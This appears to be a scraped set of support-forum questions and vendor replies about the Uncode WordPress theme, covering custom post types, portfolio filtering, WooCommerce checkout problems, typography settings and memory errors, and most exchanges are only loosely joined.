Hi there, pre-purchase question. I want to use Uncode to create a website for a music events company. So, I was thinking to use the “Portfolio’ custom post type as the ‘Events’ category. Is it possible to edit the Portfolio titles? i.e. can I change the word ‘Portfolio’ to something else? And also the ‘Client’, ‘Year’ fields etc to something else? If this is not possible, is there another way to create custom post types and custom layouts etc for an ‘Events’ category/section? Would also need an ‘Artists’ section which works similar.

Yep this tool super compress your images so you can have very good loading time also with large backgrounds (if I’m not wrong you are a photographer and you need also to preserve quality first).

I created a custom post type and I am wondering if there is an easy way to copy over the theme options associated with “post” to the new post type or do I have to build it up from scratch?
Hi and sorry for delay! No sorry this is not an option. If you are not using the Basic header that have more settings, there are not too many settings to copy. Anyway unfortunately it’s not an option of the framework.

I don’t see an option for enabling categories for the filtering when setting option for my custom post type – Is this only available for the portfolio post type? I tried change the Theme Options to match that of the portfolio but that does seem to work.
Hi leapzone! Sorry but it’s really not easy to follow you just in words, if you are using CPT you need to create a few categories and then enabling the Filter option in the Content Block (I suppose you are using for the archive layout).
Yes, I created a custom post type and have categories and I am trying the various Archive layouts, Metro for example. So the filtering options are at the content block level not the header… Is there a limit to the number of categories that can be included in the filter area at the top?
Hi leapzone, if you are using the Content Block method to style your archive pages with the Page Builder the filtering options are inside the Content Block itself, yes confirmed.
Can Content Block Items be copied or cloned? I think I have the filtering figured out.
Hi leapzone, you just need to copy the shortcodes to another Content Block (or you can use the Clipboard plugin that is part of the theme).
I currently have Uncode v1.0.0, WooCommerce v3.4.3 and WordPress 4.9.7. I noticed that the “Place Order” and “Make Payment” buttons at checkout do not work. Please advice on how to upgrade to a latest version of UnCode theme, and if this will solely fix the issues with the non-responsive payment button.

PS: be sure you have also Uncode 1.9.0 since there is a fix for the new Chrome version related to animated icons. Hope this helps.

Hi, btw we never show this option in none of our portfolio layouts so it don’t supposed you can use a sidebar on portfolio pages.
The native Media gallery is a default unless you don’t hack with some codes, otherwise you just need to insert a VC Media Gallery module in the content area and use the 100+ options to style it (then you can save this module as a default and easy reuse in all your portfolios).

I’ve already uploaded all the images to the default media gallery on all portfolio posts and was trying to avoid going through it all over again and thought I should ask before doing anything, maybe I wasn’t finding an obvious setting or something.

I tried to reinstall envato toolkit plugin, but it´s empty.

Hi undsgn, sorry for the late response… Finally I can register correctly my website, but now I got a really bad trouble; when Google crawls my site URLs, redirects to the same post URL+/undefined/core/inc/uncode-ajax.php which response a 404 and my firewall blocks their IPs, and you know it´s bad block Google IPs….
Do you know how can I solve it?

Hi again, it’s exactly what you said; the URL is not valid, that’s the problem and I don´t know, or realise, why Google try to crawl an ‘undefined’ folder in an ‘undefined’ URL… in Search Console doesn´t appear that 404, but it is strange, isn´t it? As told this file is even not part of Uncode 1.9+ versions and without a complete check to your site I cannot tell you (we also don’t have any similar reports from the past). The only thing I can think off that you have still cached some old files in fact I see you have some cache plugin.
How work the letterspacing? in theme options…how i can make spase betwenn letter ….i can define it bes theme options / Typo but it doesnt work
Hi! Actually we have no reports and our demo is fully of this option in user. Once you have defined a custom letter spacing you need to apply using for example the VC Heading or VC Posts modules dedicated option. Hi Guys – probably an odd question for you. Does the theme have a front end author submission for author posts? It’s ok if you dont as I can plug in something but was wondering if out of the box there is a front end dashboard for submissions? (PS, not asking about visual composer . . thats a given, the back end visual composer is awesome but I want something for authors to write up on the front)

My woocommerce ‘Account’ page is blank—ONLY WHEN I ACTIVATE THE ‘UNCODE THEME’. That page works with all the other default themes. I updated the theme to its latest version, tried switching to the parent ‘Uncode’ theme (not the child one which I’ve been mainly working on), tried inserting the basic woocommerce shortcode, tried inserting the ‘My Account’ content block from visual composer, but none works.

There seems to be a memory issue going on with this theme/plugins since the updates yesterday (admittedly only activated the theme 2 days prior but didn’t seem to have an issue). I am receiving a Fatal error due to memory, however, upping the WP Memory limit to 256M did not resolve the issue. The only things active on the site are the theme and required plugins. If the plugin is deactivated, the issue is resolved. It also resolves if we switch back to the default theme.
I have emailed support, stating the issue, the troubleshooting tactics our team went through, including the fact that we increased the memory limit and all seemed to check out according to the Uncode System Status overview. So far the only response I got was “You may need to increase the memory”.... I am unsure why your support team felt the need to dismiss my initial inquiry, however, I’d like to speak with someone who is willing to actually help resolve the issue.

Unfortunately this is the first time we see this error (you can verify is not part of any of the customers websites https://undsgn.com/uncode/showcase/) and I also see some codes that are not native of Uncode. The impression is that you have some malicious code. My suggestion is to disable first all extra plugins you have (I see a few), then perform a back up and update to the new version. You have a very old version so it’s important you backup your site first, please follow instructions for “Update to Uncode 1.8 (or later versions) from an earlier version”: https://support.undsgn.com/hc/articles/214001205
